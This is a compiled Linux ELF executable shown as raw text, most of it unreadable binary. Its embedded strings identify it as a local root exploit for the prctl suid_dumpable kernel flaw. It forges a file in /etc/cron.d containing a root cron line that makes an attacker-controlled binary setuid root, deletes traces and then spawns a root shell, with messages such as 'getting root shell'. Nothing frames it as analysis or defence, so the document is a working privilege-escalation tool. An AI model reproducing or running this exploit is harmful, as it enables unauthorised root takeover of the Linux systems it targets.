ELF44 (444H H ` ``Lppp((( Qtd/lib/ld-linux.so.2GNU    6`<)p/oPh?aЅIf#H[6P 0)t@:P'`,Vp: G libc.so.6geteuidsnprintfgetpidprctlexeclperrorreadlinksetrlimitsystemsleepkillchdirsetgidsignalforkgettimeofdayexit_IO_stdin_used__libc_start_mainsetuid__gmon_start__GLIBC_2.2GLIBC_2.0ii ii X\`dhlptx |    U5P%T%Xh%\h%`h%dh%hh %lh(%ph0%th8p%xh@`%|hHP%hP@%hX0%h` %hh%hp%hx%h%h%h%h1^PTRhh\QVhk_US[P\tЋ]ÐU=u)hthҡhuÉUHtt hHЃÐUjhh U)ċE EuR h0 j juhHg h\u hlBhhhXu hs hhLj qu h<E hhj> h nu hEjj.u, h h,IE` hP-uPhohhhhhh E}v hE h,E}u hE}u jxg j hŌmj uu h܌Ebjh=u(й<<)Ph jx hEEÐUWVS [)19sאF9r [^_UVS[Þ)ɍqu :[^ÉNuUSR88t ЋuX[US[7R][+] getting root shell [+] executing: %s bash /tmp/mm prctl() suidsafe exploit (C) Julien TINNES /proc/self/exe[-] readlinkThis is not fatal, rewrite the exploit [-] signal[+] Installed signal handler /etc/cron.d[-] chdir[-] prtctlIs you kernel version >= 2.6.13 ? [+] We are suidsafe dumpable! /etc/cron.d/core [-] cronstring is too small [+] Malicious string forged [-] fork[+] Segfaulting child [-] kill[+] Waiting for exploit to succeed (~%ld seconds) [-] It looks like the exploit failed D#/etc/cron.d/core suid_dumpable exploit SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin #%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d  8 H` Lo`oo2pfvƅօ&6FVfvGCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-56)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-56)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-59)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-59)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-59)GCC: (GNU) 3.2.3 20030502 (Red Hat Linux 3.2.3-56).symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.data.dynamic.ctors.dtors.jcr.got.bss.comment#(( 1HH7 p?``Go22.To``0c l  u88pPPP{l  (( DD ``  pp88@@HHLL`@ 8, (H`2` 8 P   (D`p8@HLĆ 8*@8DKHXh\h ~$ <DDH `<pp("4PDVL YnHdD Ѕf8 H 6*H=\H MYk ^ {H` 0)  @:HP'`L!H4,Cp:S`` tHG call_gmon_startcrtstuff.c__CTOR_LIST____DTOR_LIST____EH_FRAME_BEGIN____JCR_LIST__p.0completed.1__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxpmod.creadlink@@GLIBC_2.0execl@@GLIBC_2.0getpid@@GLIBC_2.0_DYNAMIC_fp_hwperror@@GLIBC_2.0fork@@GLIBC_2.0signal@@GLIBC_2.0shsetrlimit@@GLIBC_2.2__fini_array_end__dso_handle__libc_csu_finisetgid@@GLIBC_2.0crontemplatesystem@@GLIBC_2.0fname_initprctl@@GLIBC_2.0myrlimitte_startchdir@@GLIBC_2.0sleep@@GLIBC_2.0cronstring__fini_array_start__libc_csu_init__bss_startmain__libc_start_main@@GLIBC_2.0__init_array_enddata_startprintf@@GLIBC_2.0_finigettimeofday@@GLIBC_2.0__preinit_array_endsnprintf@@GLIBC_2.0exit@@GLIBC_2.0_edata_GLOBAL_OFFSET_TABLE__end__init_array_start_IO_stdin_usedkill@@GLIBC_2.0__data_start_Jv_RegisterClasses__preinit_array_startsetuid@@GLIBC_2.0geteuid@@GLIBC_2.0__gmon_start__